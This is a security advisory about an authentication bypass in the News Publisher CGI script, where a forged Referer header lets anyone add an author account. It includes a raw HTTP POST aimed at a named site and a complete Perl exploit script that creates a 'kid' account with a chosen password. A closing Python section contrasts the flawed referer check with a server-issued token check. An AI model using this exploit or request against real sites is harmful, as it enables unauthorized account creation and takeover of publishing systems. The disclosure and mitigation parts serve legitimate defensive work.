COMMAND

    News Publisher

SYSTEMS AFFECTED

    News Publisher CGI

PROBLEM

    'n30' found the following.  Yet again a CGI author uses nested IF
    statements to decide what action to take upon an incoming request.
    This time the problem allows people to add an author to the
    'authors.file' file.  This can't be done through a web browser,
    since the script assumes that if the HTTP_REFERER field is the URL
    of the news.cgi script (the main script) then you must have
    completed the login process.  This assumption would hold if you
    were using a browser, but it is easily bypassed with netcat.  By
    passing this raw HTTP request:

        POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
        Connection: close
        User-Agent: n30/browser
        Host: www.speedy3d.com
        Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
        Content-type: application/x-www-form-urlencoded
        Content-length: 71

        author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot

    it is possible to add an author.

    Below is a Perl script that will add a user into the authors.file
    for you with username 'kid' and the password of your choice.

    This is a real problem since on older versions the authors.file was
    readable and held Unix crypt() password hashes; this hole makes that
    much worse.  There are many sites using this script and some would
    probably be regarded as large.  Therefore do NOT misuse the exploit
    script!

    #!/usr/bin/perl
    #
    # News Publisher EXPLOIT by n30
    # Versions: tested on 1.05
    #                     1.05a
    #                     1.05b
    #                     1.06
    # Bug Found By: me {n30}
    # OS: Unix and Winnt
    #
    # The Problem:
    #	The author decided in all his 'enlightened wisdom'
    # that if the HTTP_REFERER url is the same as the News Publisher
    # news.cgi file. Then U have OBVIOUSLY logged in?
    #
    # Exploit:
    #	hmmm me thinks i should change the HTTP_REFERER to:
    #
    #	http://www.server.com/cgi/news.cgi
    #
    #	Using this exploit will add an author account with user kid
    #	and passwerd of ur choice.
    #
    # NOTE: There are more inventive ways to use this Vulnerability :)
    #	ie. maybe?? the Admin screen is protected by the HTTP_REFERER?
    #
    # n30@alldas.de
    # www.alldas.de, defaced.alldas.de {trib's the webmaster not me!}
    #
    # Shoutz: trib, axess, domz, acidflame, raxie,  and all who know me!
    #
    
    use strict;
    use Socket;
    
    print("\nNews Publisher EXPLOIT\n");
    print("By: n30 {n30\@alldas.de}\n");
    print("\nShoutz: trib, axess, domz, acidflame, raxie\n");
    
    if (@ARGV < 3) {
        print("\nUsage: $0 <target> <dir> <newpass>\n");
        print("\n   eg => ./sploit.pl www.example.com cgi-bin/news.cgi iisalamer\n");
        exit(1);
    }
    
    my ($target, $dir, $newpass) = @ARGV;
    
    # Setup Content-Length Header :)
    my $length = 68 + (2 * length($newpass));
    
    # Print BullShit
    print("\nRemote host: $target\n");
    print("CGI-script: $dir\n");
    print("URL: http://$target/$dir\n");
    
    # Setup URL Command
    my $url = "author=kid&apassword=$newpass&email=lamerz\@antionline.com&name=kid&password=$newpass";
    print("URL Command: $url\n");
    # Necessary to DE-Kiddie da werld :)
    my $agent = "-=Attention Admin=- pLz n0te d0wn th1s IP and P4ss ont0 fBi";
    
    my $sploit=
    "POST /$dir?addAuthor HTTP/1.0
    Connection: close
    User-Agent: $agent
    Host: $target
    Referer: http://$target/$dir
    Content-type: application/x-www-form-urlencoded
    Content-length: $length
    
    $url";
    
    my $iaddr = inet_aton($target)                     || die("Error: $!\n");
    my $paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
    my $proto = getprotobyname('tcp')                  || die("Error: $!\n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
    connect(SOCKET, $paddr)                         || die("Error: $!\n");
    send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
    close(SOCKET);
    
    print("\nWh0a chex0r: http://$target/$dir\nuser/pass: kid/$newpass\n");
    
    exit(0);

SOLUTION

    Nothing yet.
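    No vendor fix exists at the time of writing.  As an added illustration, not News Publisher's code and written in Python rather than the script's Perl, the following models the referer gate described in PROBLEM beside a replacement that trusts only a server-issued login token; SCRIPT_URL, SERVER_KEY, the 'session' cookie name and the token layout are assumptions made for this example.

```python
import hashlib
import hmac
import secrets

# Assumed deployment URL of the main script (constructed for this example).
SCRIPT_URL = "http://www.example.com/cgi-bin/news/news.cgi"
# Constructed server-side secret; a real deployment would keep it in a file
# outside the web root and never send it to clients.
SERVER_KEY = b"constructed-secret-for-illustration-only"


def referer_allows_add_author(env):
    """The gate as the advisory describes it: the script's own URL in the
    Referer header is taken as proof that the login process was completed.
    Any client that writes the raw request can set that header itself."""
    return env.get("HTTP_REFERER") == SCRIPT_URL


def issue_login_token(author):
    """Issued only after the password has actually been checked.  The MAC
    binds author and nonce to the server secret, so a client cannot forge
    or alter a token without that secret."""
    nonce = secrets.token_hex(8)
    mac = hmac.new(SERVER_KEY, f"{author}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{author}:{nonce}:{mac}"


def _session_cookie(env):
    # Minimal parse of "a=b; session=...; c=d" from the HTTP_COOKIE CGI variable.
    for part in env.get("HTTP_COOKIE", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session":
            return value
    return None


def token_allows_add_author(env):
    """Replacement gate: decide on the server-issued token, never the Referer."""
    token = _session_cookie(env)
    if token is None or token.count(":") != 2:
        return False
    author, nonce, mac = token.split(":")
    expected = hmac.new(SERVER_KEY, f"{author}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


# Constructed CGI environment for a hand-written POST like the one in PROBLEM:
# no cookie, because no login ever happened, but a Referer that matches.
FORGED_REQUEST = {
    "REQUEST_METHOD": "POST",
    "QUERY_STRING": "addAuthor",
    "HTTP_REFERER": SCRIPT_URL,
}
```

    The forged request passes the referer gate and fails the token gate; only a token minted by issue_login_token after a real password check passes the second.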